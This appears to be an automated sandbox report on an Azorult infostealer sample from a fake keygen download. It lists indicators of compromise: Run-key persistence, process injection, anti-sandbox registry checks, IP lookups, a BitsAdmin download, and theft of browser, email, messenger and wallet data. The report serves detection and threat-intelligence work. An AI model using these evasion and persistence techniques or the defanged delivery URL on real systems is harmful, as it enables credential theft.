azorult | hxxps://keygenit[.]com/d/9472d2406f110qn26n09[.]html

System Information Discovery

Processes:

ZHogaefedaeqi.exekeygen-step-4.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	ZHogaefedaeqi.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	keygen-step-4.exe

Loads dropped DLL 64 IoCs

Processes:

rundll32.exeInstall.tmpregsvr32.exe57E5.tmp.exerundll32.exeSunLabsPlayer.exetoolspab1.exec7ae36fa.exey1.exerundll32.exerundll32.exelighteningplayer-cache-gen.exe

pid	process
4128	rundll32.exe
708	Install.tmp
5632	regsvr32.exe
4804	57E5.tmp.exe
4804	57E5.tmp.exe
4804	57E5.tmp.exe
4804	57E5.tmp.exe
4804	57E5.tmp.exe
208	rundll32.exe
5904	SunLabsPlayer.exe
5448	toolspab1.exe
5904	SunLabsPlayer.exe
5920	c7ae36fa.exe
4036	y1.exe
4036	y1.exe
4036	y1.exe
4036	y1.exe
4036	y1.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
6784	rundll32.exe
428	rundll32.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
5904	SunLabsPlayer.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe
2732	lighteningplayer-cache-gen.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Ultra.execmd.exegaoou.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\SHyfesyxojo.exe\""	Ultra.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaoou.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

powershell.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

jg6_6asg.exemd1_1eaf.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg6_6asg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

254 api.myip.com
255 api.myip.com
271 ip-api.com
126 ip-api.com
159 api.ipify.org

flow	ioc
254	api.myip.com
255	api.myip.com
271	ip-api.com
126	ip-api.com
159	api.ipify.org

Drops file in System32 directory 10 IoCs

Processes:

svchost.exesvchost.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\S9YR936P.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 8D26DB4BABEA981D	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\CWUXzWKCkA	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\S9YR936P.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent B0A9BE6E7151C5AD	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

regsvr32.exe

pid process

5632 regsvr32.exe

pid	process
5632	regsvr32.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

svchost.exeB14F.tmp.execmd.exetoolspab1.exerundll32.exeatvhtgeatvhtge

description	pid	process	target process
PID 1816 set thread context of 4160	1816	svchost.exe	svchost.exe
PID 960 set thread context of 5920	960	B14F.tmp.exe	c7ae36fa.exe
PID 5160 set thread context of 2836	5160	cmd.exe	Conhost.exe
PID 5160 set thread context of 5632	5160	cmd.exe	msiexec.exe
PID 5564 set thread context of 5448	5564	toolspab1.exe	toolspab1.exe
PID 428 set thread context of 6888	428	rundll32.exe	AddInProcess32.exe
PID 5720 set thread context of 5036	5720	atvhtge	atvhtge
PID 4564 set thread context of 4940	4564	atvhtge	atvhtge

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exeUltra.exexiuhuali.exedata_load.exeultramediaburner.tmpgoogle-game.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\uninstall.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\Common Files\SHyfesyxojo.exe.config	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\install.dat	xiuhuali.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\libEGL.dll	google-game.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 2 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

6948 5804 WerFault.exe E983.exe

pid	pid_target	process	target process
6948	5804	WerFault.exe	E983.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspab1.exeatvhtgeatvhtgec7ae36fa.exeswvhtgeswvhtge

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atvhtge
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvhtge

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exec7ae36fa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	c7ae36fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	c7ae36fa.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5096 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

4896 bitsadmin.exe

pid	process
5096	timeout.exe

pid	process
4896	bitsadmin.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5452 taskkill.exe

pid	process
5452	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

Processes:

browser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exeMicrosoftEdge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

app.exesvchost.exefilee.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	filee.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	app.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
